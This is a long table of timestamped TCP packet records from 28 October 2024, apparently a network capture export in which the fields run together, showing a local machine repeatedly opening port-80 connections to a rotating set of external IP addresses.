                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.501792908 CET805001044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.501849890 CET805001044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.173051119 CET805001044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.173209906 CET5001080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.179105997 CET805001044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.179219007 CET5001080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.636010885 CET5001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.642227888 CET805001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.642328978 CET5001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.642513990 CET5001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.642548084 CET5001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.648303032 CET805001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.648358107 CET805001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.084306002 CET805001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.084531069 CET5001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.090543985 CET805001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.090629101 CET5001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.337100983 CET5001280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.342876911 CET805001218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.342967033 CET5001280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.343101978 CET5001280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.343113899 CET5001280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.348627090 CET805001218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.349010944 CET805001218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.182885885 CET805001218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.183078051 CET5001280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.188936949 CET805001218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.189034939 CET5001280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.516199112 CET5001380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.521806955 CET805001318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.521959066 CET5001380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.522211075 CET5001380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.522242069 CET5001380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.527674913 CET805001318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.528022051 CET805001318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.197910070 CET805001318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.198116064 CET5001380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.203970909 CET805001318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.204057932 CET5001380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.846252918 CET5001480192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.852727890 CET805001413.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.852823973 CET5001480192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.852926970 CET5001480192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.852967024 CET5001480192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.858378887 CET805001413.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.858830929 CET805001413.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.280266047 CET805001413.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.280431986 CET5001480192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.286379099 CET805001413.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.286448956 CET5001480192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.472522020 CET5001580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.481498003 CET805001513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.481709003 CET5001580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.481921911 CET5001580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.481982946 CET5001580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.491166115 CET805001513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.493185997 CET805001513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.914385080 CET805001513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.914573908 CET5001580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.920790911 CET805001513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.920871973 CET5001580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.130873919 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.136302948 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.136389971 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.136723042 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.136785030 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.142052889 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.142461061 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.021253109 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.021730900 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.021780014 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.021785021 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.021820068 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.022437096 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.022655964 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.023762941 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.023834944 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.037400007 CET5001780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.042891979 CET805001734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.108433962 CET5001880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.113991976 CET805001847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.114672899 CET5001880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.114883900 CET5001880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.114939928 CET5001880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.120311975 CET805001847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.120884895 CET805001847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.666467905 CET805001847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.666650057 CET5001880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.673067093 CET805001847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.673557043 CET5001880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.703788996 CET5001980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.709381104 CET805001913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.711036921 CET5001980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.711174965 CET5001980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.711263895 CET5001980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.716506004 CET805001913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.716991901 CET805001913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.141578913 CET805001913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.144809961 CET5001980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.150841951 CET805001913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.150904894 CET5001980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.346263885 CET5002080192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.354748964 CET805002034.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.354898930 CET5002080192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.354965925 CET5002080192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.354965925 CET5002080192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.360719919 CET805002034.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.361440897 CET805002034.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.198287964 CET805002034.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.198988914 CET5002080192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.205466032 CET805002034.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.205547094 CET5002080192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.216891050 CET5002180192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.224289894 CET80500213.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.224378109 CET5002180192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.225449085 CET5002180192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.225483894 CET5002180192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.233726025 CET80500213.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.236042023 CET80500213.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.939027071 CET80500213.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.974530935 CET80500213.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.974620104 CET5002180192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.170933962 CET5002180192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.176650047 CET80500213.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.190937996 CET5002280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.196732044 CET805002218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.196805000 CET5002280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.197026968 CET5002280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.197052956 CET5002280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.202547073 CET805002218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.202626944 CET805002218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.039685965 CET805002218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.039853096 CET5002280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.046900988 CET805002218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.046967983 CET5002280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.059369087 CET5002380192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.065311909 CET80500233.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.065414906 CET5002380192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.065527916 CET5002380192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.065555096 CET5002380192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.071433067 CET80500233.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.072253942 CET80500233.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.040486097 CET80500233.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.041862965 CET5002380192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.049078941 CET80500233.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.049603939 CET5002380192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.056938887 CET5002480192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.062557936 CET805002485.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.063330889 CET5002480192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.085664034 CET5002480192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.085680008 CET5002480192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.091144085 CET805002485.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.092075109 CET805002485.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.957945108 CET805002485.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.958076000 CET805002485.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.958132982 CET5002480192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.996377945 CET5002580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:27.001985073 CET805002547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:27.002051115 CET5002580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:27.002204895 CET5002580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:27.002233982 CET5002580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:27.007627964 CET805002547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:27.007680893 CET805002547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.444619894 CET805002547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.444798946 CET5002580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.450719118 CET805002547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.450792074 CET5002580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.460519075 CET5002680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.466176033 CET805002634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.466250896 CET5002680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.466916084 CET5002680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.467176914 CET5002680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.472395897 CET805002634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.472631931 CET805002634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.299953938 CET805002634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.397011995 CET5002680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.414948940 CET805002634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.418992996 CET5002680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.634552956 CET5002680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.640341043 CET805002634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.673166990 CET5002780192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.680381060 CET805002747.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.680481911 CET5002780192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.680797100 CET5002780192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.680833101 CET5002780192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.686651945 CET805002747.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.686708927 CET805002747.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.090712070 CET805002747.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.090955019 CET5002780192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.096909046 CET805002747.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.097281933 CET5002780192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.110600948 CET5002880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.115962982 CET805002818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.116554976 CET5002880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.147864103 CET5002880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.147901058 CET5002880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.153496981 CET805002818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.153553009 CET805002818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.799316883 CET805002818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.818835974 CET5002880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.825174093 CET805002818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.825232029 CET5002880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.868124962 CET5002980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.873658895 CET805002913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.873740911 CET5002980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.874021053 CET5002980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.874051094 CET5002980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.879329920 CET805002913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.879957914 CET805002913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.305397987 CET805002913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.314376116 CET5002980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.320086956 CET805002913.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.320138931 CET5002980192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.331171036 CET5003080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.336971998 CET805003034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.337038994 CET5003080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.337615967 CET5003080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.337645054 CET5003080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.343125105 CET805003034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.343190908 CET805003034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.333245993 CET805003034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.338222027 CET5003080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.374891043 CET805003034.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.374943018 CET5003080192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.386636019 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.392091990 CET805003118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.392266989 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.399827003 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.399847031 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.405308962 CET805003118.141.10.107192.168.2.5
